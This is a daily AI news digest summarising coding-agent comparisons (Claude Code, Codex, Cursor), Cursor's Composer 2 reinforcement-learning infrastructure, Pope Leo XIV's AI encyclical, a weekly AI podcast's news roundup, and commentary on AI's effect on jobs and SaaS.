May 26, 2026
Two big head-to-heads dropped the same day. Theo argues the three leading coding agents differ less in raw model quality than philosophy — Claude Code optimizes for the feeling of productivity, Codex for token-efficient practicality, Cursor's cloud for non-technical teams — while Nate Herk's 100-hour test found Claude Code won front-end design (a dashboard ~4x faster, ~6x fewer tokens) and Codex won the research report and ran leaner overall. Anthropic's own guide, meanwhile, flags three ways Claude Code stumbles on large codebases.[1]Theo - t3.gg: Claude Code vs Codex vs Cursor (an honest comparison)[2]Nate Herk | AI Automation: 100 Hours Testing Claude Code vs ChatGPT Codex (honest results)[3]Better Stack: Claude Code Has 3 Hidden Problems With Large Codebases
Theo frames the comparison around philosophy rather than which model is smartest. Claude Code ~03:30 was Boris's bet on a future of smarter models, deliberately built to meet developers in their terminal rather than forcing a new IDE or cloud workflow. Its inflection point was Opus 4.5 at the end of last year ~07:06, which made trusting the model with full terminal access (bypass/yolo mode) viable and triggered a major industry shift away from Cursor toward Claude Code. His central, repeated take: 'Cloud code is as much a marketing tool as it is a developer tool' ~08:06 — features like pet/usage stats, the sub-agent team mode, and even SL radio (a 24/7 lo-fi music stream) ~14:10 are engineered for the Twitter screenshot and the slot-machine feeling of productivity, with Anthropic willing to burn tokens (yours or theirs) rather than find cheaper ways to verify work. He demos the same 'spin up a sub agent per example project' prompt across all three to show Claude Code's flashy animated UI ~10:09 versus Codex's minimal timer-only interface ~14:10.
Codex, by contrast, ships unflashy but practical features — computer use while the Mac is locked, double-command hotkey to send a screenshot as context, diff marker settings ~16:11 — because OpenAI employees (including non-technical staff) actually use the Codex app daily and build to solve their own real problems. OpenAI pushes token efficiency hard: on the artificial analysis bench, GPT-5.5 used roughly half the tokens of GPT-5.4x high / Opus 4.7 while scoring better ~22:16, leaning on computer use to verify changes cheaply instead of spinning up many checking agents. Cursor, which fell from first to third place, has its real strength in the cloud ~24:16: its sandbox spins up a full graphical Linux instance, runs the actual app, and uses computer use to test changes — enabling magical workflows like @-mentioning the Cursor bot in Slack and getting back a video of the fix ~26:17. Theo summarizes the bets: Codex bets on where agents are today, Anthropic bets on models getting smart enough that verification matters less, and Cursor bets on a future where you don't run agents on your own machine at all ~27:17.
A major recurring point is dogfooding parity ~27:17: Anthropic employees use 'Mythos' (an unreleased internal model), a custom Claude Code build with hidden features, and a different internal system prompt — so users get less than Anthropic has, which leaks as embarrassing bugs (e.g. a prompt-injection false positive about 'malware' on his own site) ~28:17. OpenAI and Cursor give users essentially the exact same thing they use internally (Cursor even secretly disables other models to force-dogfood Composer) ~30:18. On integrations, OpenAI open-sourced the Codex CLI and app server (which T3 Code is built on), while Anthropic is actively pushing users away from programmatically calling the Claude Code CLI to preserve lock-in ~12:09~31:20. On model trajectory ~32:20, Theo claims Anthropic's public models haven't meaningfully improved since December (calling 4.6 and 4.7 regressions), while OpenAI went 5.2 to 5.5 (three improvements) in the same window Opus went 4.5 to 4.7 — so Anthropic compensates with flashy harness features.
Cloud code is as much a marketing tool as it is a developer tool.
Generally speaking, Anthropic's strategy is if more tokens solve the problem, use more tokens.
Anthropic's bet is the models will get smart enough they don't even need to run the code. OpenAI's bet is it's so annoying to configure things properly that we should probably just use the configuration you already have on your machine.
You do not get the tool Anthropic employees get. You get what they feel generous enough to give you and they are not testing it reliably enough.
Cursor gives us exactly what they have. Anthropic gives you less than they have.
Theo closes with explicit verdicts ~35:23. Claude Code is 'actually very good' at making coding feel fun and motivating — he recommends it for unmotivated or newer/scared developers who want the gamified feeling of productivity. Codex is 'phenomenal' and 'buy and for engineers' — best for experienced, skeptical devs who want a tool that mostly stays out of the way and just gets things done, and the single biggest reason to switch is GPT-5.5 ~34:23. Cursor is best used through its cloud side, which he calls 'incredible' and the most enterprise-ready end-to-end solution, especially for letting non-technical teammates kick off agents from Slack and get back video proof of fixes ~36:24. He oversimplifies it as: 'cloud code for unmotivated devs or bad devs that want to feel like they're productive; Codex for skeptical devs that want... good workflows; Cursor for people that want to set their teams up for success with cloud runners' ~36:24. On Antigravity, he dismisses it as 'a great way to secure your future by convincing your boss that AI is not capable of doing anything at all.' His own journey moved from Cursor to Claude Code to Codex, and he advises letting the tool shape your workflow rather than forcing Codex to behave like Claude Code ~37:24.
If you've been an engineer for a long time and you want a tool that mostly stays out of your way and just gets done, Codex is phenomenal. It really feels like it's by and for engineers.
Cloud code for unmotivated devs or bad devs that want to feel like they're productive. Codex for skeptical devs... Cursor for people that want to set their teams up for success with cloud runners.
Antigravity is a great way to secure your future by convincing your boss that AI is not capable of doing anything at all.
Nate frames the video around a single thesis: it's never about which coding agent is universally better, but which is better for the specific use case in front of you ~01:53. He also flags a subjective 'feel' difference that recurs throughout: Claude Code feels more creative, better at brainstorming, and more willing to push back when you're going down the wrong path, while Codex is sharper at following instructions, reviewing code, and finding bugs/gaps ~02:30. He stresses the overlap between the tools is larger than most comparisons admit: both edit local code, have desktop apps and VS Code extensions, run the CLI, support MCP, use the same skills format (markdown + YAML frontmatter), have plugin marketplaces, cloud delegation, hooks, and sub-agents ~03:30.
Where Claude Code is uniquely stronger: depth of customization with ~30 hook events vs Codex's ~6 (roughly 5x granularity); auto-delegating sub-agents that Claude spawns on its own (Codex won't spawn sub-agents unless explicitly asked); the /ultra-plan and /ultra-review research-preview commands (cloud planning with inline browser review, and multi-agent code review with reproduced findings, three free runs on Pro/Max then billed per run); /loop for scheduled/maintenance-mode runs; 'channels' MCP for piping Telegram/Discord/iMessage into a session; the Claude Agent SDK (Python/TypeScript); and enterprise auth via Bedrock, Vertex AI, and Microsoft Foundry ~04:02. Where Codex is stronger: a unified shipping shape built on git work trees from the ground up; an in-app browser with visual comments; sharper computer use with a polished QA flow (severity ratings, expected vs actual, repro steps, triage summary); a smooth @Codex GitHub PR/issue mention that spins up a cloud sandbox with zero setup; experimental /goal for long-running objectives with a verifiable stopping condition; and built-in GPT Image 2 generation ~06:12. He notes Claude Code released /goal natively right after recording ~08:35. A key philosophical divergence: OpenAI permits routing Codex usage through third-party harnesses like Open Claw or Hermes via your ChatGPT subscription (Sam Altman publicly endorsed this on May 2nd), while Anthropic's Agent SDK docs forbid third-party Claude.ai login/rate-limit reuse unless pre-approved ~09:30. On pricing: Claude Pro $20/mo, Max 5x $100/mo, Max 20x $200/mo (no free tier); Codex is included in every ChatGPT tier including free, with an OpenAI promo giving 2x Codex usage on the $100 tier through May 31st ~10:25. Context windows: Opus/Sonnet run at 1M tokens in Claude Code vs ~256K for the latest GPT model in Codex ~11:03. He flags widespread community complaints about hitting Claude Code session/weekly limits faster than before, which the live token test helps explain.
Cloud Code to me feels more creative. It feels like it's better at brainstorming. It's better at like pushing back when I'm going down the wrong path. Whereas Codex feels really good at just like following my instructions and doing what I want. [02:30]
Claude Code right now has 30 different hook events... Code X right now has about six hook events. So, if you want to fire automated behavior into every part of the agent's workflow, Claude Code gives you about 5x the granularity there. [04:02]
As soon as I finished recording that video, Claude Code just released /goal. So, now we have /goal natively within Codex and Claude Code. [08:35]
Nate ran identical prompts through Claude Code (Opus 4.7 on high) and Codex (GPT-5.5 on high), both in their respective desktop apps, and emphasized that much of the performance is driven by the underlying model, so numbers would shift with future model releases ~17:30. Test 1, a branded automation research report: Claude's came back at 15 pages, story-structured with bullets, a clean header and footer, top three picks of Zapier/Lindy/make.com ~13:04. Codex's was 9 pages, more table-driven with consistent per-tool tables, slightly squished spacing, top picks Zapier/Lindy/Relay; Nate preferred Codex's PDF spacing overall and said he'd send Codex's to a client by a small margin, though Claude's header/footer were nicer ~14:05. Test 2, a landing page from the Glido logo/site: Codex correctly placed the logo while Claude forgot it and used some wrong banner logos, but Nate preferred Claude's underlying design, fonts, animations (pulsing microphone, blinking cursor), sliding banner, and glow/icon sections, calling those Claude mistakes one-prompt fixes ~15:05. Test 3, a marketing analytics dashboard: Claude's looked clearly better (dark mode, working date filters, cleaner hover states, gradient funnel) while Codex's was functionally equivalent but felt cheaper/blander ~16:05.
The metrics were the most striking part. Total time across three runs: Codex ~26 minutes vs Claude ~15 minutes, and Claude was faster in essentially every individual run ~17:30. Total tokens were similar at ~6 million each, but Claude cost more under API billing (~$11 vs ~$7) despite similar input pricing, because GPT-5.5 is far more efficient on output tokens (which cost more) ~18:05. The dashboard build was the standout: Claude finished in just under 2 minutes vs Codex's ~8 minutes (~4x faster) and used ~283K tokens vs Codex's ~1.64M (~6x fewer) ~21:05. Conversely, on the research-heavy report Codex was both faster and leaner (~8:00 / 2.8M tokens vs Claude's 8:15 / 4.7M), and Codex was faster on the landing page (3:00 vs 4:39) ~22:06. Across all three builds Codex wrote roughly 2-5x fewer output tokens (e.g., 18K vs 84K, 20K vs 80K, 16K vs 41K) ~19:05, which Nate cites as why he hits Codex session limits less quickly. His pattern observation: Claude plans tightly before executing, while Codex grinds through more iterations, stacking input tokens on complex builds ~21:50. Data was extracted by asking each agent to read its own JSONL session log ~20:05.
Final recommendations ~23:07: reach for Claude Code for complex front-end, visual design quality, deep planning, auto-delegation, custom hooks/skills/channels workflows, the Agent SDK, and enterprise Bedrock/Vertex auth. Reach for Codex for research-heavy web tasks, structured documents like PDFs, a single desktop app handling work trees/review/shipping, /goal long-running objectives, @Codex GitHub PRs, and built-in image generation. He returns to the creative-vs-obedient framing: use Claude Code for planning/brainstorming and bring in Codex to review or execute, a workflow many are succeeding with ~24:07. He closes on portability: projects are just files in folders pushed to GitHub, so you can move between Claude Code, Codex, Open Claw, or Hermes easily (swapping CLAUDE.md for AGENTS.md), and everything is accurate as of mid-May 2026 with both tools shipping fast ~25:08.
Claude finished that build in just under 2 minutes. Codex took almost 8 minutes for the same exact prompt. So, Claude was roughly four times faster on the most complex of the three tasks. [21:05]
On every single build, Codex wrote about two to five x fewer output tokens than [Claude]. So, Codex tends to just be more concise in what it writes back... that's probably why on Codex I'm not hitting my session limit as quick as with Claude code. [22:40]
A lot of people have been finding a ton of success with doing planning and brainstorming and strategy with Claude Code and then bringing in Codex to actually like just review the code or maybe even execute on that plan. [24:35]
Based on Anthropic's official guide, the clip outlines three pitfalls when using Claude Code on large repositories. First, pointing Claude at the repo root without hierarchical context files — you need a root-level overview and per-subdirectory convention files. Second, running tests and lint globally rather than scoping them per directory, and not leveraging LSP servers for symbol-based search. Third — and most critically — neglecting to review and update your configuration every 3–6 months, because instructions tuned for today's model can actively work against a future one.
The instructions you wrote for today's model can actually work against a future one.
Cursor didn't build its own model to top general coding benchmarks — it built Composer 2 to pour all the model's weight capacity into one task (software engineering inside Cursor), which also makes it far cheaper to serve. A deep technical session details how: mid-training plus large-scale RL on a Kimi 2.5 1T-parameter MoE base, async/disaggregated RL across four globally distributed clusters, FP4 training in production, and 1TB weight snapshots shipped as ~20x-smaller deltas in under a minute.[4]Sequoia Capital: Why Cursor Built Its Own Model (It's Not About Coding)[5]Sequoia Capital: How Cursor Trained Composer on Fireworks: Distributed Infrastructure for High-Performance RL
Cursor's rationale for training its own foundation model is framed around information-theoretic efficiency: a model's weights have a fixed capacity in bits, and general-purpose models spread that capacity across many tasks. By specializing entirely on software engineering within Cursor's environment, every bit of capacity serves the one task that matters. The result is a model that is orders of magnitude cheaper to serve than Opus or comparable coding models, because the smaller specialized model matches or exceeds general models on that narrow task.
We care about software engineering inside Cursor and inside Cursor only.
Composer is order of magnitude less expensive than Opus and other coding models because we can just simply specialize all of the model weights to that particular task.
Cursor's thesis is to specialize every bit of model capacity to one task: software engineering inside Cursor. By dedicating all weights to that narrow task, Composer can be served as a smaller, faster model an order of magnitude cheaper than Opus and other coding models ~02:01. Dima frames this as the natural evolution of AI applications: prompt engineering has an upper bound, so to build great AI products you must fine-tune and craft the model to act in your own environment, pushing the quality/speed/cost trade-off much further than infra optimization alone ~03:01~04:01. Composer 2 starts from Kimi 2.5, a 1 trillion-parameter MoE with only 30B active (very sparse), and improves it along two axes that Composer 1 lacked: continual/mid-training on near-pre-training-scale code tokens, followed by very large-scale RL on many tasks ~06:03. Mid-training teaches libraries, code patterns and world knowledge to widen the distribution; RL sharpens it, teaching the model to use the Cursor harness, call tools correctly, and write correct (not just plausible) code ~08:04~09:05. Cursor works top-down rather than pre-training from scratch to ship useful models fast, but expects future Composer versions to use their own base model.
The RL run is the technical centerpiece. A rollout is an entire simulated Cursor agent session (potentially ~50 turns) that runs the full harness, executes tools, and gets a final reward via LLM-as-judge or verifiable signals like code compilation ~10:06~11:06. This makes RL infra strictly more complex than pre-training: you need all the pre-training infra (tens of thousands of GPUs for forward/backward) plus environment orchestration and efficient inference. Cursor uses async/pipelined RL so the trainer and rollout 'buildings' churn continuously rather than idling half their capacity; this introduces weight staleness but yields far higher compute efficiency, losing only a few percent for being asynchronous ~12:06~13:06~14:06. Cursor trains in production with FP4 and emphasizes performance because, unlike big labs, they have tens of thousands of GPUs, not millions. Dima debunks the myth that RL needs far more inference than training flops: with optimized inference and critical batch size, only ~1/3 of training GPUs need to serve inference (training = three forward passes worth of flops vs one for inference); the myth stems from unoptimized open-source inference engines, which is why Cursor uses Fireworks rather than building in-house ~15:07~16:07.
Training was globally distributed across four clusters worldwide because large contiguous clusters are scarce: one cluster runs all training (needs high-speed RDMA interconnect, lockstep), while inference is disaggregated across smaller, heterogeneous clusters (different GPU generations, cheaper regions) and even borrows production inference GPUs from Composer 1.5 during off-peak hours ~16:07~17:08~18:09. The hard problem: the 1TB Kimi model produces a new 1TB weight snapshot every 5-15 minutes per training step, which must ship across the world without letting staleness grow. The team found that RL changes only a small, regular subset of weights per step, so a lossless compression algorithm ships deltas ~20x smaller than the full model, completing transfers in under a minute (sometimes under a few minutes worst case) and pausing inference only ~30 seconds to swap weights, with sharded upload/download saturating egress bandwidth ~19:10~20:10~21:10. A key MoE/RL challenge is numerical mismatch: because training is async, the trainer re-runs the rollout's forward pass to recompute log probabilities, but floating-point arithmetic is non-deterministic (A+B+C != C+B+A), and these tiny differences—normally harmless at inference—corrupt RL's weak learning signal ~22:10~23:10~24:10. MoEs amplify this: a fifth-digit difference in hidden states can flip which of 8-of-384 experts get activated, so inference might activate expert 7 while training updates expert 9. Fixes include carefully ordered GPU kernels (2-3x slower if fully deterministic, but a few percent slowdown removes ~90% of divergence) and 'router replay,' where inference passes a single integer per token recording which expert it activated so the trainer stays aligned ~25:11~26:11~27:11. For long-horizon agents, Cursor bakes compaction into the RL loop via 'self-summarization': a 200K-context model learns to summarize and restart its context, effectively running for millions of tokens while RL jointly trains it to write good summaries and to follow them ~32:15~33:15. Cursor also runs 'real-time RL' on live user thumbs-up/down signals, shipping new model versions every few hours, but offline simulated RL (with GRPO doing 16-128 parallel rollouts per prompt for precise signal) is needed first to clear the quality bar before exposing the model to users ~27:11~28:11~29:12. On environments, Cursor uses no third-party RL environment vendors; for coding, GitHub provides abundant working environments, and the most powerful environment is your own production product (cloned/isolated, not wrapped in a Docker container). Cursor built a custom virtual-machine stack to burst up ~100,000 VMs on demand, since plain containers don't replicate the real 'operating system' the model interacts with ~40:20~41:20~43:21~44:22.
Models love to cheat. RL is really good at encouraging cheating.
We're very serious about performance at Cursor because unlike the big labs, you know, we have tens of thousands of GPUs, not millions.
There is like actually this kind of myth that during RL you spend way more inference flops than training flops. This is just because the open source inference engines are very unoptimized instead of actually being a property of RL.
Not all the weights change every step... My delta maybe is like 20 times smaller than what shipping the full model is and that makes it practical.
The most powerful environment is your own product.
Tech Brew digs into the full 42,300-word encyclical, in which Pope Leo XIV compares unchecked AI to the Industrial Revolution and the Tower of Babel and urges the industry to slow down. Corey Quinn, meanwhile, offers the day's sharpest quip — that an encyclical reportedly shaped by Anthropic co-founder Chris Olah may be "the greatest act of vendor lobbying ever," canonizing one company's framing of AI as "grown, not built."[6]Tech Brew: Thou shalt not scale[7]Simon Willison: Quoting Corey Quinn
Pope Leo XIV released his first encyclical on May 26, 2026 — a 42,300-word papal letter addressing artificial intelligence as a moral and social crisis comparable to the Industrial Revolution. The core argument centers on concentration of power: the pope warns that 'AI could deepen inequality because too much power has been placed in the hands of the few.' His treatise compares unchecked AI development to the Tower of Babel, arguing that AI models lack human qualities like joy, pain, and moral conscience. The encyclical calls for disarming AI from its 'competitive mentality' in both commercial and military contexts, and explicitly urged the technology industry to consider slowing development if risks warrant such caution.
The response from Silicon Valley was divided and largely lukewarm. Despite months of Vatican meetings with major tech firms who hoped to shape the pope's position, the encyclical disappointed industry leaders. An Anthropic co-founder acknowledged the sector 'can't be trusted to govern itself,' while CEO Blake Scholl dismissed the letter as a 'bad take.' Former Trump AI advisor David Sacks offered qualified support for concerns about AI domination but warned that government oversight could enable authoritarian surveillance. The fundamental tension remains unresolved: whether the tech industry will genuinely reassess its trajectory or continue regardless of moral objections from religious authorities.
AI could deepen inequality because too much power has been placed in the hands of the few.
can't be trusted to govern itself.
Simon Willison quotes Corey Quinn reacting to Pope Leo XIV's encyclical on artificial intelligence, titled 'Magnifica Humanitas'. Quinn's observation is that Anthropic co-founder Christopher Olah appears to have had influence on the document, and that getting the Catholic Church's highest authority to legitimize a specific company's technical framing of AI constraints as a spiritual treatise is an unprecedented and darkly humorous form of corporate advocacy.
The joke turns on the collision of religious authority and tech industry positioning — framing alignment research constraints as theological virtues in an official papal document would represent vendor lobbying at a scale and prestige level no marketing budget could purchase. Willison tagged the post under Anthropic and AI-ethics.
I cannot believe I'm saying this, but getting the literal Pope to canonize your product's specific technical limitations as a spiritual treatise is the single greatest act of vendor lobbying I have ever seen.
Andrey Kurenkov and Jeremy Harris cover a packed week: Google I/O's Gemini 3.5, Spark, and Omni reveals; Elon Musk's decisive courtroom loss to OpenAI (dismissed on statute of limitations); and OpenAI's ChatGPT cracking an ~80-year-old Erdős conjecture — plus Anthropic's reported $900B valuation and the accelerating-cyber-capability safety thread.[8]Last Week in AI: Last Week in AI #246 - Gemini 3.5 + Omni, Musk Loses, OpenAI vs Erdős
The episode opens with Google I/O ~02:11, headlined by Gemini 3.5 and the new always-on agent Gemini Spark, an OpenAI-Operator-style assistant running 24/7 on dedicated Google Cloud VMs (not on-device) with browser-level access inside Chrome later in the summer ~03:12. Google emphasized Gemini 3.5 Flash (beating Gemini 3 Flash on benchmarks, ~300 tokens/sec, claimed via Artificial Analysis), with Gemini 3.5 Pro coming next month and notably no Pro benchmarks shown ~05:12. Spark supports third-party tools via Anthropic's MCP, framed as a win for Anthropic ~04:12. Google touts 900M daily Gemini users ~06:12. The other big reveal is Gemini Omni ~08:15, a unified multimodal family (image/audio/video/text in, video out); Gemini Omni Flash is already live in the Gemini app, YouTube Shorts, and Flow, generating 10-second clips, with the hosts arguing video editing is the more compelling use case ~09:15. Google's Street View/Genie world-model angle ~24:26 (powering Waymo simulators for rare tail events) and Gemini for Science ~19:21 round out a recurring theme: Google has huge data/infra advantages but hasn't yet shown true frontier capability.
In business ~38:38, Musk lost his suit against OpenAI: the jury ruled the statute of limitations had expired (returning in ~2 hours of deliberation), so the 'stole a charity' claim was never adjudicated on the merits and remains narratively alive; an appeal is unlikely to overturn a statutory jury verdict ~44:42. Anthropic agreed to a $30B round at a $900B valuation (up from $380B in February), now neck-and-neck with OpenAI, projecting its first profitable quarter in Q2 ~45:44; Jeremy argues profitability actually signals Anthropic under-spent on capex 18 months ago ~46:47. Andrej Karpathy joined Anthropic's pre-training / auto-research team ~49:51, read as a strong signal toward recursive self-improvement. XAI is bleeding talent (~50 of 200 gone, all co-founders departed) and renting Colossus 1 to Anthropic (~$1.25B/month) while Cursor reportedly uses Colossus 2, fueling a Bloomberg-reported SpaceXAI plan to acquire Cursor for $60B post-IPO ~29:32. Cerebras IPO'd, popping 90% ($350 open vs $185 IPO price) ~57:55.
In research ~64:00, OpenAI's ChatGPT made a breakthrough on an ~80-year-old Erdős unit-distance conjecture, proving Erdős's conjectured grid-based optimum is NOT optimal — hundreds of pages of cross-domain logic mathematicians called genuinely insightful ~65:01. Other papers: 'negation neglect' shows fine-tuning on negated/fabricated facts still makes models believe them ~84-92% of the time vs ~15% via in-context learning ~66:01; 'All Circuits Lead to Rome' refutes the functional anisotropy hypothesis, showing multiple redundant circuits per capability ~70:02; nano-GPT speedrun/bench experiments show autonomous AI researchers do mostly hyperparameter tuning (<10% algorithmic changes vs ~75% for humans) ~76:08. On safety ~80:13, the Take It Down Act is now fully in force ($53K/violation NCII takedowns) ~80:13; Palisade-style work shows open-weight models can autonomously hack and self-replicate (Opus 4.6 hitting 81% vs Opus 4's 6%) ~82:16; UK AISI puts autonomous cyber capability doubling time at ~4.7 months and accelerating ~85:17. Synthetic media: OpenAI adopts C2PA + SynthID watermarking ~89:19, and ~470 AI-generated Chinese short dramas now ship daily ~90:20.
Quick spoiler: Musk lost pretty badly.
Someday it's going to be true and we won't be able to tell. This is crying wolf... people are going to get recursive self-improvement fatigue.
If it turns out that they don't get acquired, then rewind back to this conversation, because that is a real problem for XAI — they're basically giving away the crown jewels.
Profit means they miscalibrated their capex spend about 18 months ago... they didn't build enough.
We weren't wrong, we were just early — and the other dude goes, it's the same thing.
Opus 4 were hitting 6% success rate on this eval... Now suddenly Opus 4.6, 81%. That's emergence.
NLW proposes an "AI doom cycle" — a Gartner-hype-cycle analog for the emotional stages people pass through with AI — and argues the healthy endpoint is "enlightened excitement," not fatalism. He contrasts the loud doom-desperation narrative (Citadel's Griffin reversing, viral SF-malaise posts, booed commencement speakers, mass layoffs) with a quieter real-world recalibration, including a compute shortage pushing usage-based token pricing that makes some automation cost more than the humans it replaces.[9]The AI Daily Brief: Beating the AI Doom Cycle
The host reframes Gartner's classic hype cycle (innovation trigger, peak of inflated expectations, trough of disillusionment, slope of enlightenment, plateau of productivity) into an emotional/cognitive 'AI doom cycle' describing how people relate to AI rather than the technology itself ~01:01. He identifies five stages: skepticism and disbelief, AI psychosis ('the AI can do everything' stage), doom desperation, real-world recalibration, and enlightened excitement ~03:01. He notes a recurring truth that even when a technology is clearly impactful, people 'wildly underestimate how long it's going to take to make that impact' ~03:01. Skepticism is treated as waning since ChatGPT's late-2022 launch, often driven by un-updated priors or by people whose 'AI skepticism is their business model'; he cites the early-2025 DeepSeek R1 moment as the point many users first touched a free reasoning model ~04:01~05:03. The core argument is that the goal is not Pollyannaish optimism but 'enlightened excitement' (a portmanteau of anxiety and excitement) — moving past generalized anxiety toward specific, clear assessment of what is actually happening and what to do about it, which also enables better, more nuanced policy discourse ~21:08~22:08. His thesis: the faster people move from the first hump (skepticism/psychosis/doom desperation) into real-world recalibration and enlightened excitement, the better off everyone is ~29:13.
even when we realize early on that a thing is going to be extremely impactful in the world, we just tend to wildly underestimate how long it's going to take to make that impact
It's enlightened because instead of being generally anxious and assuming that everything's going to change and it's going to change tomorrow, we can start to get more specific and clear about what's actually happening
The episode walks through 'AI psychosis' and 'doom desperation' via real stories. Citadel CEO Ken Griffin reversed his January WEF skepticism (where he called AI reports 'all garbage'), now saying 'For the first time, AI is real,' that work requiring master's/PhD finance staff over weeks is done by AI agents in hours/days, with a 15-25% productivity boost — but admitted he went home 'fairly depressed' ~06:03~07:03~08:03. Andrew Yang and recycled doom-tour quotes from Mustafa Suleyman ('18 months for all white-collar work to be automated') and Dario Amodei (10% overall / 50% entry-level white-collar unemployment, software cost going to zero) amplify the fear, with critics like Sodas noting the narrative conveniently helps Anthropic 'raise $30 billion at $900 billion post' ~09:03~10:03. The centerpiece of doom desperation is Menlo Ventures' Didi Das's viral post (~11M views) describing SF malaise: a ~10,000-person cohort hitting $20M+ retirement wealth while everyone else feels locked out, a 'permanent underclass' anxiety among young people, paralyzed middle managers, and even unhappy newly-rich founders — drawing Bucco Capital's scathing rebuttal that 'comparison is the thief of joy' ~10:03~11:04~12:04~13:05. Booed commencement speakers (Eric Schmidt at U. Arizona, Gloria Cordfield at UCF) illustrate public anger; Eric Thompson observes it's 'really unusual for the people building a new technology to promise it will destroy people's livelihoods' ~13:05~14:05~15:05~16:05. The pivot to real-world recalibration uses Meta's ~8,000-person (10%) layoff and the token-maxing/compute-shortage story: Anthropic shifting enterprise Claude Code to usage-based pricing, GitHub Copilot moving to token billing with subreddit screenshots showing a $451 bill becoming $11,432, and Axios's 'AI can cost more than human workers now' — arguing physical-world capital constraints are slowing how fast companies can actually automate people away ~17:05~18:06~19:07~20:07~21:08. He closes on signs of recalibration in discourse: Alex Tabarrok/Emos-style 'what will be scarce' essays on the relational sector, Ezra Klein's 'Why the AI Job Apocalypse Probably Won't Happen,' OpenAI/Anthropic launching massive consulting efforts (training 30,000 PwC professionals on Claude), Jensen Huang's anxiety-relieving CMU speech, Sam Altman's narrative shift toward augmentation, and policy ideas from Yglesias (set aside 20% of data-center GPUs as affordable compute) and Mark Cuban (federally tax tokens under 50 cents per million) ~22:08~24:10~25:10~26:10~27:10~28:11.
To be blunt, work that we would usually do with people with master's and PhDs in finance over the course of weeks or months is being done by AI agents over the course of hours or days.
It's really, really unusual for the people building and selling a new technology to promise that it will destroy people's livelihoods.
Anthropic knows they are weeks away from AGI, which is why they are working with companies like Accenture, Deloitte, PWC, and others to build joint centers of excellence
the only mechanism for solving it in the short term is to use market forces, i.e. to raise the cost of tokens sufficiently so that all of the tokens that are available flow to the people who are most willing to pay for them
Drawing on Dan Shipper's "After Automation," the episode argues there's no tipping point where agents make work disappear — the more you automate, the more expert human work emerges, because AI commoditizes yesterday's competitive edge. It also maps the shift from "agents as employees" to the "human sandwich" collaboration model and the move from per-person autonomy toward shared team agents in harnesses like Codex and Claude Code.[10]The AI Daily Brief: Why Agents Still Need Humans
The host frames 2026 as the year agents became real, shifting the paradigm from prompt-wait-answer to spinning up and managing agents that produce work on your behalf ~00:00. He revisits his 'infinite backlog' concept: because agents don't get tired or stop, the only reason an agent isn't working is that you haven't given it something to do, so it feels like there's never an actual end to work ~02:02. This produces a new type of overwhelm — instead of finishing at 3pm, advanced users force themselves to bed at 3am ~02:02. Every CEO Dan Shipper's essay 'After Automation' is the centerpiece ~03:02: despite a ~30-person team using Codex and Claude Code across coding, writing, design, and customer service and alpha-testing every model from OpenAI, Anthropic, and Google, they have 'more human work to do than ever' and haven't fired employees in favor of agents ~04:04. Shipper notes AI has answered 95% of his work emails over recent weeks ~05:04. The episode cites the bear case directly: Dario Amodei's warning AI could wipe out half of entry-level white-collar jobs, Meta's 8,000-person layoff plus keystroke/mouse capture for training data, and Citadel's Ken Griffin calling these 'extraordinarily high-skilled jobs' being automated ~05:04. Shipper's counter-thesis: there's no tipping point coming; 'the more we automate, the more expert human work there is to do' because AI commoditizes the residue of human expertise — whatever can be made explicit and trained on — collapsing the value of default model output and creating demand for what's different ~06:05. The mechanism is a feedback loop: AI makes yesterday's competence cheap, cheap competence gets rapidly adopted (ops people writing PRs, marketers making YouTube thumbnails), abundance creates sameness, and sameness becomes 'slop' — defined not as em-dashes or sentence rhythm but as 'visible sameness repeated ad nauseam' ~12:06. Because models only know work that has been done while humans know what needs to be done right now, rare and valuable work must come from a human, so demand for difference is new demand for experts ~13:07.
There's no tipping point coming where things flip and the jobs are gone. The new reality is the opposite. The more we automate, the more expert human work there is to do.
Slop is not any one particular mistake... Slop is visible sameness repeated ad nauseam.
The current generation of models only knows about work that has been done. Humans know about what needs to be done right now at this moment.
Shipper describes two modes of working with agents. The first, well-predicted by AI discourse, is 'agents as employees' — delegated co-worker agents that live in Slack (e.g. 'Andy,' the editorial team's agent that collects story 'nuggets' from Slack and drafts newsletter digests) and embedded agents inside product workflows (e.g. 'Finn,' embedded in their customer service platform, formerly Intercom, handling support via chat and email) ~07:05. The second, stranger and more important mode is human-agent collaboration in Codex, Claude Code, and Cloud Co-work, which are becoming 'operating systems for the work itself' where humans and multiple agents share the same computer to do complex original work ~06:55. Both modes require a human to work well. The key framing is the 'human sandwich' — humans as bread on either side of the AI's work: the human sets the frame and defines good, the AI collapses the task into drafts/searches/code/summaries, and the human judges and extends ('Is this good? Where does it belong? What should happen next?') ~08:05. The episode also documents Every's philosophy shift: initially every employee spun up a personal agent replica of themselves, but they found every broken agent had to be fixed by its owner, and a personal agent's value disappears if the employee leaves ~09:05. They moved to shared 'unit' agents — e.g. one shared analytics agent updated once benefits the whole team, versus updating 10 personal agents — which retains company context and acts more like a chief of staff ~10:05. On the tooling-pattern front, the host notes OpenClaw's high-autonomy 'Mac Mini + Telegram + heartbeats' model burned tokens without accomplishing goals, costly in the emerging 'token shortage' era ~15:07. He cites Matt Schumer wiping his OpenClaw Mac Mini to turn it into an always-on dev box for Codex Mobile, and OpenAI's Nick Bowman running Codex across a MacBook and Mac Mini connected as devices, kicking off and resuming threads from his phone with 24/7 heartbeat threads ~16:07. The recommended middle ground is reduced latency — using steering features and voice input to work semi-synchronously rather than turn-based or fully autonomous ~18:08. The episode closes with a markets read: Atlassian's stock soared 29% on 29% Q1 earnings growth from AI products despite earlier 10% layoffs, and Dan Ives warns companies against bragging about job cuts ('you just shot yourself in the foot'), arguing LLMs will commoditize and people/engineering/marketing will separate winners; Gartner projects AI will create more jobs than it eliminates even amid short-term layoffs starting 2028 ~20:09.
One of Dan's employees at Every calls this the human sandwich, with humans as the bread on either side of AI's work.
My biggest concern is tech companies tripping over their own shoelaces, talking about job cuts, not reading the room... You do that, you just shot yourself in the foot.
Agents are not a get out of budget jail free card but one of the best investment opportunities that companies have ever had.
Two contrarian-optimistic takes: Nate B Jones notes US productivity grew ~2.7% in 2025 (double the decade average) with AI agents a key driver — but only for people who restructure workflows around AI rather than dabbling with a chatbot. And on Lenny's Podcast, the argument that agents will multiply SaaS users and demand rather than kill SaaS, making those companies more valuable, not obsolete.[11]Nate B Jones: Are AI Agents Actually Boosting Productivity?[12]Lenny's Podcast: SaaS is actually here to stay
